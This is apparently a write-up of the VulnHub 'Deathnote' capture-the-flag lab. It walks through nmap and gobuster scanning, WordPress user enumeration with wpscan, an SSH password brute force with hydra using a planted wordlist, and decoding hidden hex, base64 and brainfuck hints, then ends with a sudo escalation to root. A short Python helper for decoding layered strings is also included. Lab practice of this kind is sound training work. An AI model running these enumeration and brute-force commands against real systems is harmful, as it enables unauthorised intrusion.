kali IP: 192.168.43.118
Host discovery: sudo nmap -sP 192.168.43.1/24 or sudo nmap -sn 192.168.43.1/24
--> Target IP: 192.168.43.188
Port scan: nmap -sC -sV -p- 192.168.43.188
--> Open ports: 22, 80
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
| 256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_ 256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
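Browse to http://192.168.43.188:80
--> Automatically redirects to http://deathnote.vuln/wordpress, and the page cannot be displayed
Bind the IP in the hosts file: 192.168.43.188 deathnote.vuln
--> The page now displays normally; the title shows kira
Click HINT to find the hint -> Find a notes.txt file on server or SEE the L comment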
--> L comment: my fav line is iamjustic3
Directory scan:
gobuster dir -u http://deathnote.vuln/ -w ../seclist/../direct-2.3-m.txt -x php,html,txt
--> robots.txt
fuck it my dad
added hint on /important.jpg
ryuk please delete it
There is a /important.jpg and an account name, ryuk
View http://deathnote.vuln/important.jpg in the browser -> no content -> download it with wget
file important.jpg -> ASCII text
cat important.jpg ->
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira
i can only help you by giving something important
login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site
Information gathered from HINT: L kira iamjustic3 notes.txt
Information gathered from important.jpg: Soichiro Yagami user.txt
The site runs WordPress, so scan it with wpscan
wpscan --url http://deathnote.vuln/wordpress -e u
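--url specifies the URL
-e, --enumerate [opts] enumerate; u -> user IDs
--> Found one account: kira
Scan the directories under wordpress:
gobuster dir -u http://deathnote.vuln/wordpress/ -w ../seclist/../direct-2.3-m.txt -x php,html,txt
--> /wp-login.php: found the login page
Try logging in with the information gathered earlier -> kira:iamjustic3 logs in successfully
Found notes.txt in the media library; download it and view its contents: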
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
cat notes.txt
death4
death4life
death4u
death4ever
death4all
death420
death45
death4love
death49
death48
death456
death4014
1death4u
yaydeath44
thedeath4u2
thedeath4u
stickdeath420
reddeath44
megadeath44
megadeath4
killdeath405
hot2death4sho
death4south
death4now
death4l0ve
death4free
death4elmo
death4blood
death499Eyes301
death498
death4859
death47
death4545
death445
death444
death4387n
death4332387
death42521439
death42
death4138
death411
death405
death4me
It is a password list.
Build a user.txt from the information gathered earlier:
user.txt:
l
kira
ryuk
soichiro
yagami
Try brute-forcing SSH:
hydra -L user.txt -P notes.txt ssh://192.168.43.188
--> l:death4me
The directory contains a user.txt file
--> cat user.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.
It is brainfuck-encoded; after decoding -->
i think u got the shell , but you wont be able to kill me -kira
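Look for other files; the opt folder contains an L folder, so view its contents
--> fake-notebook-rule and kira-case folders
View the contents of the fake-notebook-rule folder:
--> case.wav and hint files
case.wav is a string of hexadecimal: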
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
hint -> use cyberchef
CyberChef is a website for encoding, decoding and encryption; use it to decode the contents of case.wav
-> from hex: cGFzc3dkIDoga2lyYWlzZXZpbCA=
-> from base64: passwd : kiraisevil
Try logging in to the kira account with this password:
su kira
Login successful
Change to the /home/kira directory; it contains a kira.txt
cat kira.txt
--> cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp
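Hex and base64 are encodings, not encryption, so the case.wav content above is effectively a plaintext password stored on disk. The following is an added example (not part of the original write-up) that peels such layers automatically, which is handy when auditing files for stored secrets; the function names are hypothetical, and the two sample strings are copied from case.wav and kira.txt above.

```python
import base64
import re
import string

# Values copied from the write-up: contents of case.wav and kira.txt.
CASE_WAV = ("63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 "
            "6c 7a 5a 58 5a 70 62 43 41 3d")
KIRA_TXT = ("cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwg"
            "KC9vcHQpCjIuIE1pc2EgKC92YXIp")

PRINTABLE = set(string.printable.encode())


def _try_hex(text):
    """Return decoded bytes if text is whitespace-separated hex, else None."""
    compact = re.sub(r"\s+", "", text)
    if len(compact) < 8 or len(compact) % 2:
        return None
    if not re.fullmatch(r"[0-9a-fA-F]+", compact):
        return None
    return bytes.fromhex(compact)


def _try_base64(text):
    """Return decoded bytes if text is strictly valid base64, else None."""
    compact = re.sub(r"\s+", "", text)
    if len(compact) < 8 or len(compact) % 4:
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def peel(text, max_layers=5):
    """Strip hex/base64 layers while the result stays printable ASCII."""
    layers = []
    for _ in range(max_layers):
        for name, decoder in (("hex", _try_hex), ("base64", _try_base64)):
            raw = decoder(text)
            if raw and all(b in PRINTABLE for b in raw):
                layers.append(name)
                text = raw.decode("ascii")
                break
        else:
            break  # no decoder applied: this is the innermost layer
    return layers, text


if __name__ == "__main__":
    print(peel(CASE_WAV))
    print(peel(KIRA_TXT))
```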
sudo -l -> check kira's privileges
--> (ALL:ALL) ALL: can switch directly to root
sudo su
root obtained
Originally published on the WeChat official account (北京路劲科技有限公司): Range Practice No.10: VulnHub Deathnote